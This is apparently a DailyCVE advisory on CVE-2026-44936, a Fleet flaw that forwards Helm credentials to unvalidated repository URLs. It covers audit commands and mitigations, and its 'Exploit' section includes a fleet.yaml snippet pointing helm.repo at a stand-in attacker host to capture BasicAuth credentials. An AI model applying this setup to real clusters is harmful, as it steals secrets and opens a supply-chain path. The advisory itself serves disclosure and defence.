Fleet, Helm Credential Leakage via Unvalidated Repository URL, CVE-2026-44936 (Medium) -DC-Jul2026-815

Listen to this Post

How CVE-2026-44936 Works

Fleet is a GitOps continuous delivery tool for Kubernetes clusters. It watches Git repositories for changes and deploys Helm charts or Kubernetes manifests to downstream clusters. To fetch private Helm charts, Fleet supports authentication via a `helmSecretName` field in a `GitRepo` resource, which references a Kubernetes Secret containing BasicAuth credentials (username and password) for a private Helm repository.
The vulnerability arises when the `helmRepoURLRegex` field is not set on a `GitRepo` resource. In such a configuration, Fleet’s bundle reader forwards the configured Helm BasicAuth credentials to any URL specified in the `helm.repo` field of a `fleet.yaml` file contained in the monitored Git repository.
An attacker with `git push` access to a Fleet-monitored repository can exploit this by modifying the `fleet.yaml` file to set `helm.repo` to a malicious URL under their control (e.g., https://attacker.com/evil`). When Fleet's controller processes theGitRepo, it reads thefleet.yaml, extracts the `helm.repo` URL, and—because no `helmRepoURLRegex` is present to restrict which origins are allowed—it sends the configured BasicAuth credentials to the attacker‑specified URL.
The attacker's server receives the credentials (username and password) that the administrator configured to access the private Helm chart repository. This allows the attacker to capture these credentials and potentially use them to authenticate against the legitimate Helm repository or other services if the credentials are reused.
However, in versions after Fleet v0.13.3, the response body from the attacker's server is not included in the error message returned by Fleet. This prevents additional internal data (such as cluster metadata or other secrets) from being leaked through the status condition, limiting the exposure to just the credentials themselves.
The final severity of this vulnerability is not fixed—it depends entirely on the permissions associated with the leaked credentials. If the credentials grant read‑only access to a single Helm chart repository, the impact is limited. If they grant write access or are reused across multiple systems, the impact can be critical.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Fleet
Version: <0.12.15, <0.13.11, <0.14.6, <0.15.2
Vulnerability: Helm credential leakage
Severity: Depends on leaked credentials
Date: 2026-05-28
<h2 style="color: blue;">Prediction: Patched versions already released</h2>
<h2 style="color: blue;">What Undercode Say</h2>
<h2 style="color: blue;">Audit Auto‑Migrated GitRepo Resources</h2>
After upgrading to a patched version, review all `GitRepo` resources that were automatically migrated by the Helm pre‑upgrade job. The migration job adds the annotation `fleet.cattle.io/helm-regex-auto-migrated: "true"` to resources that had `helmSecretName` or `helmSecretNameForPaths` configured but lacked a
helmRepoURLRegex.
Run the following command to list all such resources along with their auto‑derived regular expression:

kubectl get gitrepo -A -o json | \
jq -r '.items[] | select(.metadata.annotations["fleet.cattle.io/helm-regex-auto-migrated"] == "true") | "\(.metadata.namespace)/\(.metadata.name): \(.spec.helmRepoURLRegex)"'

<h2 style="color: blue;">Verify the Auto‑Derived Regex</h2>
The migration job extracts the scheme and host from the Helm repository URLs already stored in the resource's Bundles. For example, a `GitRepo` with Bundles referencing
https://charts.example.com/stable` receives helmRepoURLRegex: "^https://charts\.example\.com/".
If the auto‑derived regular expression is broader than necessary (e.g., it matches unintended subdomains), replace it with a more specific pattern.

Example Secure Configuration

apiVersion: fleet.cattle.io/v1alpha1
kind: GitRepo
metadata:
name: my-app
namespace: fleet-local
spec:
repo: https://git.example.com/org/my-app.git
helmSecretName: helm-creds
helmRepoURLRegex: "^https://charts\\.example\\.com/."

This ensures credentials are only forwarded to URLs matching the specified regular expression.

Check Migration Status

The migration job runs only once per installation and records its status in a ConfigMap named `fleet-helm-url-regex-migrated` in the Fleet system namespace. Inspect it with:

kubectl get configmap fleet-helm-url-regex-migrated -n fleet-system -o yaml

Exploit

  1. Gain Git Push Access – The attacker must have write access to a Git repository that Fleet monitors (e.g., through compromised credentials or an insider threat).
  2. Modify `fleet.yaml` – In the repository, edit the `fleet.yaml` file (or create one if it doesn’t exist) and set the `helm.repo` field to a malicious URL under the attacker’s control:
    helm:
    repo: https://attacker.com/evil
    chart: my-chart
    version: 1.0.0
    
  3. Wait for Fleet Sync – Fleet’s controller periodically syncs the `GitRepo` resource. When it processes the updated fleet.yaml, it reads the `helm.repo` URL.
  4. Credential Exfiltration – Because no `helmRepoURLRegex` is set on the GitRepo, Fleet forwards the BasicAuth credentials (from the Secret referenced by helmSecretName) to the attacker’s URL (`https://attacker.com/evil`).
  5. Capture Credentials – The attacker’s server receives the HTTP request containing the `Authorization: Basic ` header, decodes it, and obtains the plaintext username and password.
  6. Lateral Movement – The attacker can now use the captured credentials to authenticate against the legitimate Helm repository (or any other service where the credentials are reused), potentially accessing or modifying private Helm charts.

    Protection

– Upgrade to a Patched Version – The most effective mitigation is to upgrade Fleet to one of the patched releases: v0.15.2, v0.14.6, v0.13.11, or v0.12.15. These versions require `helmRepoURLRegex` to be explicitly set before any credentials are forwarded.
– Set `helmRepoURLRegex` Manually – If you cannot upgrade immediately, manually add the `helmRepoURLRegex` field to all `GitRepo` resources that use `helmSecretName` or helmSecretNameForPaths. Ensure the regular expression matches only your legitimate Helm repository origin(s).
– Audit Existing Resources – After upgrading, run the `kubectl` command provided in the “What Undercode Say” section to identify all auto‑migrated resources. Verify that each auto‑derived regex is sufficiently restrictive.
– Rotate Compromised Credentials – If you suspect that credentials may have been leaked (e.g., you cannot rule out prior exploitation), immediately rotate the affected Helm repository credentials and any other credentials that may have been reused.
– Monitor Fleet Logs – Check Fleet controller logs for unexpected outbound requests to unknown URLs, which could indicate attempted exploitation.

Impact

  • Credential Theft – An attacker with `git push` access can capture the BasicAuth credentials (username and password) configured for accessing private Helm chart repositories.
  • Scope Depends on Permissions – The actual impact is not fixed; it scales with the permissions of the leaked credentials. If the credentials grant read‑only access to a single repository, the damage is limited. If they grant write access or are reused across multiple systems (e.g., for container registries, CI/CD pipelines, or cloud APIs), the attacker can escalate privileges, modify charts, inject malicious code, or pivot to other environments.
  • Data Exfiltration – While the response body from the attacker’s server is not included in error messages (fixed in v0.13.3 and later), the credentials themselves are still transmitted in plaintext (over HTTPS) to the attacker’s endpoint, enabling exfiltration.
  • Supply Chain Risk – Compromised Helm chart credentials can lead to the injection of malicious charts into private repositories, affecting all downstream clusters that consume those charts.
  • Compliance and Audit – Organizations subject to regulations (e.g., GDPR, HIPAA) may face compliance violations if credentials are leaked, especially if they grant access to sensitive data or production environments.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top